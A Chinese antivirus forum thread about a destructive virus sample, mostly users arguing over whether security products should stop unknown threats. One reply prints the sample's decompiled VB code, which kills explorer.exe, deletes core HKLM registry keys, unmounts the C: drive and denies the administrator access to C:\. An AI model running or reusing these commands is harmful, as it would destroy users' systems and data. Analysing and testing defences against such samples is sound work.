楼主: 杀软综合狂

[病毒样本] 一个破坏型病毒,测测你们的杀软能否防住

Lawchake78
头像被屏蔽
Lawchake78 发表于 2020-8-5 15:03
无知?我买它的产品我还要摸透它的东西,要非常熟悉IT安全技术?难道在使用它的过程导致自己的设备中招了 ...

人身攻击有意思吗?我对你的回帖里有羞辱你,甚至对你人身攻击吗?我只是根据事实结果就事论事罢,何况当前大把的主流杀软都喜欢在自家产品的宣传文案上都大力宣称能够抵御超前未知威胁,究竟又谁骗谁啊!
aaaaoooo
头像被屏蔽
Lawchake78 发表于 2020-8-5 14:44
我的工作比你体面得多,拿得也比你多

想起一个富二代在游戏中的话,不要拿你的工资和我的零花钱相比~也许他是富二代呢?
Lawchake78
头像被屏蔽
aaaaoooo 发表于 2020-8-5 15:11
想起一个富二代在游戏中的话,不要拿你的工资和我的零花钱相比~也许他是富二代呢?

论着论着,人身攻击都出来了
lixihong10
Private Sub Form_Load() '402660
  loc_004026F8: var_8008 = Shell("cmd /c taskkill /f /im explorer.exe", 2)
  loc_00402768: var_44 = "reg delete " & Chr(34) & "HKEY_LOCAL_MACHINE\SOFTWARE\Classes"
  loc_00402784: var_800C = Shell(var_44 & Chr(34) & " /f", 2)
  loc_004027A4: var_8010 = var_44
  loc_004027FD: var_34 = "reg delete " & Chr(34)
  loc_00402827: var_8014 = Shell(var_34 & "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide" & Chr(34) & " /f", 2)
  loc_00402847: var_8018 = var_34
  loc_00402865: var_24 = Chr(34)
  loc_004028CA: var_801C = Shell("reg delete " & var_24 & "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft" & Chr(34) & " /f", 2)
  loc_004028EA: var_8020 = var_24
  loc_004028FA: var_8024 = Sleep(10000)
  loc_00402938: var_8030 = Shell("cmd /c mountvol C: /d", 2)
  loc_00402963: var_8038 = Shell("@echo y|cacls c:\ /d administrator /c", 2)
  loc_00402974: GoTo loc_0040299A
  loc_00402999: Exit Sub
  loc_0040299A: ' Referenced from: 00402974
End Sub

恐怖如斯
Lawchake78 发表于 2020-8-5 15:03
无知?我买它的产品我还要摸透它的东西,要非常熟悉IT安全技术?难道在使用它的过程导致自己的设备中招了 ...

杠精是真的厉害,安全软件先进到了无敌的地步,那病毒的利益链还存在吗?病毒如果不存在了那安全软件还能存在吗?按照你说的,你去买东西直接买最贵的最好的就行了,中低端的产品都是垃圾,我为什么还要买它。厂商为什么不造永远先进不会过时的产品呢,为什么同一个东西还要分三六九等。

你觉得行业不符合自己的价值你就不用好了,因为目前没有安全产品能满足你,这个论坛也不是你该来的地方。你还留在这干什么呢?
记录微笑
@314122674
@Lawchake78
最后一次提醒,不要进行口水战和人身攻击,若再继续将按照最高处罚等级处罚。

评分

极简极纯 + 1 辛苦了,感谢维护

imisbeat
eset nod32 解压过程中直接全部干掉。推荐eset +火绒超强防御模式
共和时代
Lawchake78 发表于 2020-8-5 14:26
就事论事,我又没违反板块,凭什么封我号!听到自己觉得刺耳难受的说话就想耍损招?

我说你了吗?
Lawchake78
头像被屏蔽

好吧!对不起,我向你道歉
nich
头像被屏蔽
提示: 该帖被管理员或版主屏蔽